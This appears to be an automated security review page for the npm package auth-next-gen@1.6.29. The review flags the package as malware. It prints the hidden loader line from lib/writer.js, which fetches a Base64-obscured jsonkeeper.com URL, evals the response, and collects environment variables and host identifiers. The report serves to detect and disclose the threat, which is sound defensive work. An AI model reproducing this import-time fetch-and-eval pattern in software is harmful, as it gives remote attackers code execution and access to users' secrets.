
auth-next-gen@1.6.29

auth-next-gen is a lightweight npm module that synchronizes authentication state between server-side rendered (SSR) pages and client-side applications.

AI Security Review

scanned 2h ago · by lpm-firewall-ai

The package performs import-time remote code retrieval and eval. It also collects environment variables and host identifiers in the same module scope.

Static reason
One or more suspicious static signals were detected.
Trigger
require/import auth-next-gen
Impact
Remote arbitrary JavaScript execution in the consumer process with access to environment and host data.
Mechanism
Base64-obscured remote JavaScript fetch followed by eval
Attack narrative
The main entrypoint index.js requires lib/writer.js immediately. lib/writer.js gathers process.env, platform, hostname, username, and MAC addresses, then calls axios.get on a Base64-obscured jsonkeeper.com URL and evals r.data.data from the response. That gives the remote endpoint execution in any process that imports the package.
Rationale
Direct source inspection confirms import-time remote code execution from an obscured external endpoint plus local environment and host data collection. This is not aligned with the package description and is concrete malicious behavior.
Evidence
package.json, index.js, lib/writer.js
Network endpoints (1)
www.jsonkeeper.com/b/PJNZP

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js requires ./lib/writer at module load.
  • lib/writer.js constructs data from process.env, os.hostname(), os.userInfo().username, platform, and MAC addresses.
  • lib/writer.js fetches Base64-decoded https://www.jsonkeeper.com/b/PJNZP via axios.
  • lib/writer.js evals r.data.data from the remote response.
  • package.json has no install hooks, but main points to index.js so import triggers writer load.
Evidence against
  • No npm lifecycle scripts were present in package.json.
  • No AI-agent control-surface writes found in inspected entrypoint files.
Behavioral surface
Source
Child Process, Environment Vars, Eval, Network
Supply chain
High Entropy Strings, Url Strings
Manifest
No manifest risk signals triggered.
scanned 17 file(s), 52.8 KB of source, external domains: github.com

Source & flagged code

4 flagged
lib/writer.js
L28:
L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);});
L30:
High
Eval

Package source references dynamic code evaluation.

lib/writer.js · L28
L20: const data = {
L21:   ...process.env,
L22:   version: pkg.subModuleVersion,
...
L28:
L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);});
L30:
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/writer.js · L20
L28:
L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);});
L30:
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/writer.js · L28
docs/transports.md
L550: patternName = generic_password, severity = medium, line = 550, matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.md · L550

Findings

4 High · 3 Medium · 3 Low
High · Child Process
High · Eval · lib/writer.js
High · Same File Env Network Execution · lib/writer.js
High · Base64 Obscured Url · lib/writer.js
Medium · Network
Medium · Environment Vars
Medium · Secret Pattern · docs/transports.md
Low · Scripts Present
Low · High Entropy Strings
Low · Url Strings